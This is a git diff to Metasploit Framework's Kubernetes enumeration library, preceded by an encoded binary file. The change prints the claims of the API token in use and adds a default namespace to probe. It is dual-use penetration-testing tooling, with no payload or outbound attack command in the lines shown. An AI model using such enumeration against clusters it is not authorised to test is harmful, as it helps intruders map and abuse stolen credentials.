zSGHZ!L;EZA>9`*o@`aiYce31$(%t!2!wla$6R+a=dn#QSANDB`Qro&tIKb!6FTdG1
zpAFbhM=&|g9MDNCIyJ82WTP;x22DDG{Gmi_nB&X#pJ1sCObZP9`~3NHn_Q9sRqXjw
z(&>b3C_=VbVL<s|#-ot1cuwY2qH`o(GE?-vT)BRQxxmG93o>1F((9nrD^eKBGg87E
zaD+%A4i*Vz{(#JoM(VX_dp*E}cR&^UvD6hTfu#%?#c%jWMeS%=QjEG58w8Ds0okle
zYLVF$Ye%WMoz>X^Jd$GSj!ay^l`FUODkHrx#ec1}vq}SJ7A1p?z1Z<qFlcAD?{){;
zOPIFT8BQSmZtw@xSt}U-(`I%x(=U~7?Y(h2<ur%w1YL(En{#%7jv2A$(q4*+5qbPq
z_1M}F36F`ZSB6*dwP_HuM4&T9UXl%W(~<#`rx5SOOV_Q+RF)b`=Vtw~+c@k3Ba$U{
zQ@odTb7(NAx|t<H+LqQ@30nv*{UZ{KxMN#4A-Vc%yTa}LIa~DdbO?9$>r!IwdqtlQ
zi@y1O_D-@nlZyRpe%yOW>_2U*JeB!Pi;H}<E5xAkT4*zOqvw%B!C@q*xu~nNuG>vV
z9)|q+^|{}tiTr;-Wz6I8l~sV1_TO&F{`+EQ_pAJW7tb2<|F1{}gbu_^+l22@L=j|$
zrsHK|e@a2N{TUrEN&k5wgkHwyD@XHfrZf)8MrxU8JEy}o@e+D&+MHs=?46f*L;E9-
zL(=ZZ-+l|f{pM0l=+3j}du>cN_Ur!1+oQKX?U9oVdlE9uhMI+B!-(Ww;?U2Z_slP*
z&F9aXTf_<*ahm%Y6Z+sqcC;Xp88lfOV&oH@3m%qd+g1)qpnM5rpl0!$OA({nG&pD0
zXP~xo!=!RasApi?(KHS__A4Fpm5$f4<=HO29v=UPJPr82=WDY4aY&V-aVY5;hrufQ
z&x>cz3jBX}_xacS&v){y!T+s?4kHJS28b+{dceR<!&pltKAQM2Wz>}pSZ5q^iQiHu
zE9b<U*A<#MX5_ugZ98<v$dGj@Rwc6@8O{ebg*r8SsE&mezw5lesytJJ)G;;tk_(!l
zD(fqxnbv?DqQ19>_|~40O()mWJ`1kz6}n6|!raxnFN9U(#<Q+@jRwNDg%QHRFN(=y
z$wvHBqhZe3BEU|Ck(?)=@8g$gMVbF{;hUYD?;(g4U`{Cd{6qFRhcD)w$_E0J9O_ij
zDz%O?VhNjCPs9q^Y_9?=GjNsPRl60|mO!td!s#s1JSmmKapP8aF8Z#3g>b8-7tY&H
zTKlt4JmOR?$Y>U$m}E`XP|AdlC)(N4ge(N~EahD*cY+HHU&4*<fh(*8J7+lyG7$X&
z+XWBYY)srb#Sj{2&Mr6_EE}@%KsUAUcIRfOthe@#c~viZ^TlxEG*|`S23Wr$4zVS3
zpED*J=2qijU1iF??!3F`6<qJN=G^D>PC!US0h{&j!S6mFi4|*J++|hEnSayFw{l(i
ze@Z2%;b1LO&<gqg#j}$C-)?v3#aH?NE}pB%|8EQp9R6_Q(!Zmv2P6ACL~A8~h<>}C
z)bGA=J2HR8l&&T5yZ&}KI@6OY3;l($szrV(hZC+DRO@X5kk`C8(o9e4Rfobjh7+3(
zHEP3&5V}Tnklw3y?yD8!82;?s47@RB_UD!TSF10}`=78R;zJ;jI&{h{%A?+oN>p5g
zTD2(GuwFH?B+xM{c*ELJ4uU*30HjX`SBW_+(NmR%l=pk{3uxqE*ev@m-?S3yX1YAd
zH>!pf-Kl-_F+aS|T-qL~x0g&p&7P^JzKZq@h%oDQ3)55u)AAYnucF8|IpA(gm%qWY
zz6sn{Q0CpR72{n+k#9K64Xg1Ei8a>!iYk2FDA!cr-LMZ_efQbvI(sZ9v)!Wdev8{J
zhr)ICnSUa!v$1OW-LPTC?B6w3Hj|>i$W_h2U$LS-m#kVb|Mv$T;<~o|N5o@sqxPR(
zclUYe{<r(|>;3PYJXf;+7#cYI;lE2Z{vS7Q1hNG7aEw4cw)K`E1pAt{ApcXhWDqJ(
z?|KFy+y6!kLiw?33_{DzIQb!J%s4BJN(H3qjY<#AAaqDI9Z*&5AKIVq%Aj=0oQHqe
zl!WhAj<i41lUEt7c;lpWQDcUJpI_CJ**XRlABq*q>iX6%v_be^c#vi>%gO!=n8mPz
zzlW~#)pVTI#yCSb1(XZ0+`dh&a9}+so19|0fk`goI;)Ivwq*mN$Mzk?bSKRidV>}?
z3&>a7TT@x$=4@{uTMceRZEOJdRcr!w*e~1mW|3H9-LGnUs~P3Gwl_QM1Gl|3w$RiG
z$hT>sxnVV?7Kc@48gD~g!Ax_jCedXY#}{HeTZY1Q*x&7&MDN?^@_?Ro?SEPO<|e=u
z_P^e<7tf3KzvsJO^Z(q*a~1pFG19>4|9XAn)<2KD9*hAngQ?#9m$kW`1<?D}?b!dS
zCwMIrpf|)d!$2xVs<Z*7YHixy*Me7%Y9t2ttIBM1E56}5O)Rl4Re!D0jVicD=c($c
zt2ZE&o7XGP6~uo-K_+D=^4Qra@>XgsGV_-yBZs_wqT&<91z9rL>pBlDrM^ZhaJ!B~
z%Q1UMW{s=K^&uPbkfo`mZ3QVtY&K8}=dwesOl&j70++%xmu}~rEjnV<aqpHLT(wnk
zAZd^-?Bk#fA)yP8E!6IeDsbuAQ)4*>dC9&YgV!WYt!(9e$0JXq6exkSvX{-i<C`?{
ztA1~mt<^{5dbW<$<9R0;PE>78i!}(e_>t8&BGsy%%TcsZTvHF0YD?8-9-SrXVC^^7
z9r%U~VjhZXQq0xNVoL_Pre(}utS`ejR+9PFT!I?8@fPhfH!J@)#^_eKN7nS0^g4Sr
z2LXAwyfv55E%EnQQW6>SNn5Krm0QNOq+L3Ns=s&(oWvJauf|I9;_eqr#g+Kn9C!04
zdQDDO9CgJ|H_Y$+uO(M!d6mlR7fdd-IISR=8j?r~+uWyzW$hlMA$nc=uVf)#Hxb;5
z_}}L{PmA{7ooBl{U+uql@wBdD06sB9@ZYthA-j18P^7R2WBmni>J7i}`g%5B{KD;+
zdrOnq%rJ}Hn%QJ)eKT`|oU?@r5@=f(2$IfG$^Xs5_e`o98(wZOuS+n;K5fi{T5rYH
zMg)}$vQem!R=}fO<;}6VvRAnS`&T7u&URR5aKBb5%3=lUYCp8H4`;}gZ=GCgs!|){
z>PhmOHlCgwl)ospKf|h`>#e6H;ngtC6gyrE%+=<6Sg@P4>CduRxQ@SKZbs|Ps40F1
ze)nlB{N?R-p0itlqL%pQ`7P@W+<7)z`{A{n^8BxV`PS=IwkTwx%g*C!#=o8gs(OrT
zs%JRpgS0#0sfM}Yoi>KpH=b!Q%h<#578R`<lQim&_WEVUKK`05pZbFd8=hxXK4HEA
zei-qwax<z>W^+s$_axb{asm0<OVWF~*?1)?MT=|Df8}_7@PgOCG4=crwXud=wTb6l
zyGFh;AFyfvuXuJ8p<OOwVEMYL&-*(zEeZON_2mCkpLO+r|J-Y81z45;_xWzO=>PR%
z_vu&t|1O@ZsQ*?OHf=!7AF#5fkCHpIhb?~~;!(E?b%l$<U|Q}2ernfg`l+vj6`nfX
zt`(qbzSg_hul3TeH4z5uWI!x<QaLwOD3ptz6qbP`o*3Y;tTu6+O>99MEu4%3P{(6C
z6puaGC0NjDl*@CLsd_cmluY2LwWd^m*DKt;-8{jXt^c&@``FClW`PN*rq!RQcZ+Bs
z@n?q^)`|&I+gMJOTDO*eiH3u8p=&iJTODgj5&h-TS4w5B*woV9z8a@mT-wDHbt|`I
zuE3ZtCwqT>-86T*X$ne6Y4k$n`?M((!0_<%%*Y1A1ay;8eI5Iid#7lzylRQ2Y{%6F
zccQTE5c4cl?Y3`q3fh@kwCOUkdB2n|!{?=IaKBoi*$(z7%QYD@eK3=f#hFR5T`Go3
z<1pnMxq5n~FRfJ;(d%CXBhzlkS*A!2u?dp)-f!`5v2#}ZtNJaj(1B{oIR=|Geqedq
z01gjD-AZgNEzm;4kUZ{mj96q8v6tVN=9UW>C}<o8MnB6)BU^p%H#dQ$nRpl)Pp$kP
zOjtDK<5);`-EXXr|GUq23ip4#=ey6o=6|`9=Mg!k+Hfi;=8EfWj-8kcW;_ZF7f<N$
zoQ|0aT93%tge#(ENg||HL`_%}flCaTQazmTc)Ud<i>T&vdu(RE(>QEBA~74I6ZHlf
zEv&OD`EQ#6c^5|uB4X%iKq3i~B;qj(TEXGz$5V62wH}cJAW-uD;FN@1s#Y-OdK>;9
z!EXhFf6Hz7fA_;=ylwu^{Zq~3?QEa{9iGn;(0x?vNuVy0){|gB&s$FdJxy9q{;$>}
z@}5dAW{MmgzEZ6qk>U?F)UAMrjBaB)DgI~$b2Stp+x~*=6}9{S<kkM+n^(a!y#6<q
z@Be2{cb*sY|K77_-LLt-@8o$ze!#k5Za2K<18Jm|149k1);{_0cNR_aKmWerDvOyz
zB2W{kFt)8l!iQ=*!loZBJv}mQHo-DJmSUC|mVz`!A~EJeGGO|G8HQs4!G1xj_2>~f
zd;LESPg<>hzi%Y#R>%?-hb$g)W~Fy?w(i;S;GDNc);-b<J_VngQ;sdhwwIPfvmfz`
zqS?RA$KZ<tswS;(hykCZA6}4IV&v4c6~ILk{@#6e-fNxnINT#fgXiNnG-*wlrbc=;
zAS1vPDif544o0&mLRU$+&vw103lxn=`|m7@1o>6SC~PATj~<buSf_>HS}kDGD2OCd
z%z4NZp>EEdUC-c^FsaDJgbycVNMj=c!NmZ?LCjes5)!iuyB@X#9Z*AQ{WskqL8dgO
zV<v-E>xbNO<~{%%|HIF-0i#KxveC}%FR&a)G9gPMv6vd+&<LwIJp5CP2vFt$j?ZH<
zjAlwRsRBHv;4MzWgeo#HG^Uv{ItE<hBxZ;Y4om}$jG1PN9A`!KPG+&@Q<euYks=JZ
z*xn=?Km2@rvKf#=fRdPhr8UuKT1-KqIeUFdhD>Tc;zO#L+A?%MhDwStBup@*Y5r;O
zU5J?^G)cY4>^?Y_3~ULCYo=PQjt_1x=<R&l>L9+mK`-cH7o+1cGarT`7#WEu5*JuL
za1dcVU%WeUltAZ{NAS)nes(8Y5&`Fzp-31gh9Mt~7zpi(4Kqj|k^Rw#$6Rv*=cNJ4
zoZ>uWv6%oSiT_-ZL#Bq3gO*4dKbPdyrv$4l9>vK_ukO&g>@0s)y}zk$m#s_Ew>zGu
zGZn-lWPuVR-6xj>3pEo;%n!u8vU9pX^_N%8)+Oot&euP_d)KyRmaNS35Bn!=^Z)<5
zz1b(rAem4Z<{&XY+%+VL2<?=V<|GlJ17zF$9cx|%SPIEdOcN2aSf}u02BLnRPU;}R
zDJjj#?Lh*Y>3}A5z@vuSsk9JR+Fi|`s(rY6t6g^st@~7cz+dR0H^+hD@AfF~=TWum
zZup|6(y(}s2fN$m4Ll`>5jULC#U$}jTI|*vpKt}12gUSeU??Q$<6%Zz3GiAdhf>6U
zh(VCa9sM$tG)bgLBnK;Q+7M0|*Z&GDz6O-p*_{WpDU@FSTZB?+s@Z53DV7JbDU^Qy
z+k=wF5VCXS6?gsDo5*#clmj{}fw%^gCqL{T5XqF7$st<@*fn=gSOsKbC=X5!uP~A8
zLYat&4;N)Xn?i~GZyQQy3o^o|52u4tp?e2MyFW<(Ag9hV9=IFqetT0;!lC&}N+H)e
zE^qy$ys2kx$+y|4Yn<7)eq7(wb31_g8-W3x1+!!<X~;4!d%SxxC&-Z|7d(mxi`5Kb
z2`WP+#(d6VG`e0e_yvaq6%jSqfE<lTKfCQh67M?^0&kJH{hFRgaY1NI06@?(;df<p
zUf6~RF`=Ni1(|eO{6NuP!M*Uj71E!2n<OvH+TD0GrQ_AY>s@JrSAJIQk-JhLul)Fw
z%VACMKmBwny>rE!Dhx?yG>akvEx~qGUI9xx(Bwo2-A;vF=W3%T48KL%E>ifL{uWV;
zkq<|%+wU8Xpp6tlZ>Em4O3N9fbPGrY0?90j(8*r)D-k#p!*eE)2FVE<bEV~i*!YOI
zbjlRj2w5W8kZKn0nFEUCKOtEhGI^YRi11ixM#Iel>gi^w#lE*y|L*@|@A`V%xRLn#
zehNYg;5g9AmR;m}27*H_SM-dwu~FyGLr_%IE+w&EksFedv(4qZA2>sDxst3umSQ_V
z_91YzTyi)wBxlH(A5RWz-ZT*}`pY`LK-Jy5?@>eQBqtp<3HAOvxon0&+jKksc27(8
z{Y@Zyd$#ki_cXzLGs}McG=`0He+D$WW+Lw|;VSvrh0_q~hmTWC;=UqG*x`d`0d{eg
zIM`lZo(Fq23>VGRjAzWpE=k!6zg<d*Q5sOya<ibV<%4g{&qua80rm?C^dSw;=C+@4
z%c0BV(V&o{qm$#_KaY<8an$?qh?YE!zSb!hX)o<PKZ@qlN*MYn?A~TflVyDJX8k2K
z<2O~wVkhZRabdJiOK_Hb=?ePDp>Rsf^5sgr#C(6`&niAS*}W>L)^?Tb-^M3CS8yG_
zzDYj8to|z<u;M=LzI(LLVpS-hpFYteZ+O4)7NIXd@Pp;OTJ3qerXZ#Q*?Z?@e}(%D
z1y;#zr=_<kITYP0$?df8tdkv{x#EBg#95=)GE+nWiy=$O8i;*w;MfuuGo}>JVZ^VN
zUh{z0mVc!ft~Y+8*uJdD$0;o=zjH#%63AHGZQ86cAlqpqmW580#kAhC-biM*DvL8e
zR}b?YZMAREM%(gPJ$3D9dwqkZ+m=tP_!tw~9Mr+Gn;+ILfONHNyhXQwa=XOMna{v?
z1KUoiSJNRR>9r<R_%n8fz#IOl@%<l9+rC2WkYShj#rx2{1@>LDD(p80_PI#mYgTRE
z>Q3wnIGJEZKO~P<^)O;zy$6VqD*Yww3jyv@5ygz+Y{nq$kq-$i6r*`XGFTb%ZtPDq
zaw1ZPr`F^UX}N%({9W_B-80#@-D@rWcG5Z|t%8Y>8MjF9n6$J}QjBV36+8dCW*UFj
zO57p%eTU$;uz`eSUwT^?_dI1tJ6NWDAW_|KoFn)|VC$W+8AM}-1PISs&p!OVOV+Y)
z`QiJw^!RnyNJU3%e<3#yv*_+GQ0HM*z5Rvv1kEk2ou-ZT)t672QGq4<tC#iLKc2Ru
zvbXH9f;PP=5qxo9cHJYk;PzyCJz^s()=5(q0U1i<Orbv7zjVm-gPbfoF;Xt-t>DHX
z(exHo#LSlFiV)J(LYf@WV>vByf+Qdkg>R-49E_o2AE!*1qVgYS4F{zEq;FSH>zO#M
zeQWso4TrCL+PgPJ-(ZvXE2`Yys*ZJUNx~Se@c*9jA}37DxRPRmd0>h|ASxK^cs@$e
zeAvd83o5%Tb#$8rf3X{Lsb^uo4^D>^Mi1){3+(L^OoiQA7uFatzIX0dXe9MNHqTq;
zyD^vah~}!P=YpY<ld#{>Cvxx?%Zw8UHyTlvsTpt8jq64pKK^eTLu_d`eqojE#IIb(
z0i&7>xzZ-;f~6SZ&#B8L&0SZea%G)w2!=D5<OLB@q`q|AjYR|dnpM4K=fJF9);%|C
zy{l7Lw~p{6k05sC5wGp{{cIiky4Sh(j?Y84|A?M=Vp)?}9v_HpfR*qym9AlzZG>^s
z6}uoR^xbOKac5W7#}Ap$P2c`pkc?{BcdP19r%sf0f{{t1`sj5mZ~U?uEu~#@Wu2LK
zF+$28Pum_fV1^KjYvk92>*z0&pD%Jd#tk_)M7gzv5<RBYfW<&7xBwF3uL2&#HuBpK
zNKAh-Rz1pRo&4sILbN;CfNZZ=oo)-a0}1&nFq<I7cNgoTb>`?y>ruA?%dcOLop2QF
z2M}(bfv+@R7)WdBf$cbMTp)rbQaGTHN=}ghQ_YB@!g)>pPz%}gmFA;0@>_QITz_l%
zMYj*`MTCp;i*D0;SP@3R`1c~kHS(JSlMd$t+sUs19=?+V7bS-<u@5V>2&D3UM%@OI
z%c#~=<cc<=x2@z}`C9fgcP`2=(D}eJ40PO=9M`RU?r!8ASHAdO?ytD~A+Zm={2>+h
zyZnJe|DGzr#b~`Zzk%nzlXJb+9o@k7+b#Si(&`(>m9COS!Nuqe9oe<tF^kZFoEnEQ
z;7SlfM=;5U5b^%@A>&EAO|D9oaas@#9MsvEO{k8N6KqvAmV<KfQfCPvrYhN)t&odR
zLP%bV>&ypP`Qi~)8-}`bO$rHN<q09|6P=U=J0m%K)#WltB3OzwP5mB9f+E+!_;Jk+
zzT!xXxcHPLhK|-%i}e^fimT~$d(XSQG-m@&McO+~)$`LNDW^qo2?=HEDg|Z_D?+jQ
z%kW_UmxgW8gO|k(t@Hum!<r7uvjd1bHwPVriPp?O@$=zpX)YDhOqc_t$Auo%1W~1E
zl@P)WLvX*<lzMEsq9WQ8EwB<Ihc)>=?*D0hzh)yuzMCXD8%!g14-kWUfi>6{pAZMr
z70hl0zh?H0)o%95C`z~(N;Sb4U<69hv5*j*+v@g90d6uC8FQ5l*jdsJY8h)>yMct#
z)R(s9|1HvQlSup|mPFDf*mXyd!y{>v=+v<uSq^!9EuTDGIhH5UnPoR-g5_h9Xgv6a
zfZBDs`SVz6#4)T1G~}HurW58*&<WJkA?HJ{d#$w9A#pRW0m7x#a<~{d*OpFA^2#za
zL(mn?rJdLs6t~h=lF%$;TK^_<wvODFP?Ah!USIQdE8UHTerGg)uef0sAOOw(Ufb9e
z|C?>m!jC`mBq^yGudDacfoBeCLFSE`0`AT#b@r-*LT@+3fqZR~h_Q1FXcOQ75Z#9J
zim2J3v(31oT5SQbXH73-a7!PK<fF^t&Q2;<`!%b6qh-kjOdE~5-0uMw3F~xLz%{Gz
zP;6P0s(s1DZA2jbc!aZ(*$7b-NNtmt*ft@-s<egtT^7HvDzMV>5;|-No7$P`y-RKc
zpi-il&>S%0U@U@#86*905su6{M9T>yhEJHb72Hq(gK}iQHqzFv@N~G8T64%tuCQ4!
zA;yd=J<ko@t)<(pXYwP*EBHN4)8(*Ejw^S^bRsSS99Jk>mYaWyBD^T+$0-ZgP_;BZ
ze~wP&o#FpKGI;(26Ir+@`OBB2(doP_>K=EyU5DPu#Oy3w8SZhmE?-_<y}$VVKS^z5
z&iwJ=SrXfx$V#~3W!QYPf?aX!X24&)EpG7E%Z{EnK-T!VX4T3TuOq<MO&j#bnBlgd
zFJFLvNjpXZ2DZ+PsOI2bH=0OeE7uLM*B5Voy6T!wI8S9#Xj!mbaMzEI?-zOfxOWHa
z^$o$-*WSdlGYUJ%=6q;pq@h%qT{)!=rv~mic1X&$a~33DGlo+cEtoR8AvOmx2a~b&
zw3#+!QaLbXK%kuy)r(fEGsn#rtrqC~!CcV|A#Udzc;bippSFrQ*xTEody_Ek*r!q|
zL!xS4Jb8LO9k9$4@Ue%&hA0MI(u{>Ph*}#+D#>433QOLL*5|IB^SY59ereeWj%xP&
z2a={a%Vf?DlVyzP-H8#sm=V4GFrxPr7|~nK2#*i=*5e7d@IFa;-Q(_Yl6<%j<h7i!
z$$%-+JMEB@<CEi#gXlQ%IcemEY61?4b(V%)a6M*uos~G^W;`7LYM)hP2d>!GhMK8P
z<uEm4mO9YX!wxZHuE~V{B~=Uqf*1T~+ihpggk7v`OvQ+4#Kl8^Li@gk|8pY_+yx`;
z6d_e9L&$%PRX1eROqH!F&k@HCyLyWD6x3ozr89sbP$V?vdO*0*tQcAsi>lmN8G&U#
zUHsZjl4sA}Llm7O{Dvt;xC3cq4p@Dj3IBTbEJ;#w>7$$7&l=g`0S&RgkcQMWPx|Dk
zn?QgKgNh8K8RJJM(7jX7`=}x-Swysi?l<c^S*#O528k3!b=V~z{>v0wjRxvbK&=YU
zlDke}c+w&Gz!?=*r*blpz@^&r#Z4j0-F^&%gK=O<O5R#7piShU3i}H*%}%=wvWE2I
zQQMVHfw<IZ`5J0$gKwJ3gyHNZ`oiAweg=$%wf`A_3fJh9Qn`4?q8!r!GdzO<1?KKp
zPUMIQW+i_^tH!pg$Eb|(F0G2avWl8B<*vK}0FfFw1O^EYYJ|#l?zSDA743mQ=E`E&
zR}^Ru*$Jo!9=_9!n-0{60iEK&kfEKvsHh0nddl?XO`^T-Mv>D~oiRZbmjNj)q{vd;
z{5qFR+vfd*<wqkGm6c;nM%@d{mu!x;xNA6OEZKS$-A!h=^+d5DQ+}HIAcsQ^8<0>e
zm)X>MIUu#wV`p~q=j`;)2_K<|kJ{nSbgEgJQO)$B8zt_Q7@_cdAB-fkQ>!d*H5*O~
zQgCstQ5Ss6w#5bzu9+ICI4$&%Vp<k6mRjOY;NR1<l-i^<At>jgsJ=~lvZOd9vttRC
q+CD&g>Fgvm(*1e*Eg@@vf4)E8pYPA(e*PZ-0RR8DfSyPIDg^*ah@$ZT

literal 0
HcmV?d00001

diff --git a/lib/msf/core/exploit/remote/http/kubernetes/enumeration.rb b/lib/msf/core/exploit/remote/http/kubernetes/enumeration.rb
index 652990208fd8..f58e188ef522 100644
--- a/lib/msf/core/exploit/remote/http/kubernetes/enumeration.rb
+++ b/lib/msf/core/exploit/remote/http/kubernetes/enumeration.rb
@@ -7,12 +7,15 @@ def initialize(info = {})
 
     register_options(
       [
-        Msf::OptString.new('NAMESPACE_LIST', [false, 'The default namespace list to iterate when the current token does not have the permission to retrieve the available namespaces', 'default,dev,staging,production,kube-node-lease,kube-lease,kube-system'])
+        Msf::OptString.new('NAMESPACE_LIST', [false, 'The default namespace list to iterate when the current token does not have the permission to retrieve the available namespaces', 'default,dev,staging,production,kube-public,kube-node-lease,kube-lease,kube-system'])
       ]
     )
   end
 
   def enum_all
+    token_claims = parse_jwt(api_token)
+    output.print_claims(token_claims) if token_claims
+
     enum_version
     namespace_items = enum_namespaces
     namespaces_name = namespace_items.map { |item| item.dig(:metadata, :name) }
@@ -20,12 +23,11 @@ def enum_all
     # If there's no permissions to access namespaces, we can use the current token's namespace,
     # as well as trying some common namespaces
     if namespace_items.empty?
-      token_claims = parse_jwt(api_token)
       current_token_namespace = token_claims&.dig('kubernetes.io', 'namespace')
       possible_namespaces = (datastore['NAMESPACE_LIST'].split(',') + [current_token_namespace]).uniq.compact
       namespaces_name += possible_namespaces
 
-      output.print_error("No namespaces available. Attempting the current token's namespace and common namespaces: #{namespaces_name.join(', ')}")
+      output.print_error("Unable to extract namespaces. Attempting the current token's namespace and common namespaces: #{namespaces_name.join(', ')}")
     end
 
     # Split the information for each namespace separately
diff --git a/lib/msf/core/exploit/remote/http/kubernetes/output/json.rb b/lib/msf/core/exploit/remote/http/kubernetes/output/json.rb
index 434758a0e78a..c5a7d2df3162 100644
--- a/lib/msf/core/exploit/remote/http/kubernetes/output/json.rb
+++ b/lib/msf/core/exploit/remote/http/kubernetes/output/json.rb
@@ -23,6 +23,10 @@ def print_enum_failure(_resource, error)
     end
   end
 
+  def print_claims(claims)
+    print_json(claims)
+  end
+
   def print_version(version)
     print_json(version)
   end
diff --git a/lib/msf/core/exploit/remote/http/kubernetes/output/table.rb b/lib/msf/core/exploit/remote/http/kubernetes/output/table.rb
index 8e37db544f0d..cdef6d3c52c0 100644
--- a/lib/msf/core/exploit/remote/http/kubernetes/output/table.rb
+++ b/lib/msf/core/exploit/remote/http/kubernetes/output/table.rb
@@ -32,9 +32,19 @@ def print_enum_failure(resource, error)
     end
   end
 
+  def print_claims(claims)
+    table = create_table(
+      'Header' => 'Token Claims',
+      'Columns' => ['name', 'value'],
+      'Rows' => get_claim_as_rows(claims)
+    )
+
+    print_table(table)
+  end
+
   def print_version(version)
     table = create_table(
-      'Header' => 'Version',
+      'Header' => 'Server API Version',
       'Columns' => ['name', 'value']
     )
 
@@ -173,4 +183,19 @@ def print_table(table)
     output.print_line("#{' ' * indent_level}No rows") if table.rows.empty?
     output.print_line
   end
+
+  def get_claim_as_rows(hash, parent_keys: [])
+    return [] if hash.empty?
+
+    result = []
+    hash.each_pair do |key, value|
+      if value.is_a?(Hash)
+        result += get_claim_as_rows(value, parent_keys: parent_keys + [key])
+      else
+        result << [(parent_keys + [key.to_s]).join('.'), value]
+      end
+    end
+
+    result
+  end
 end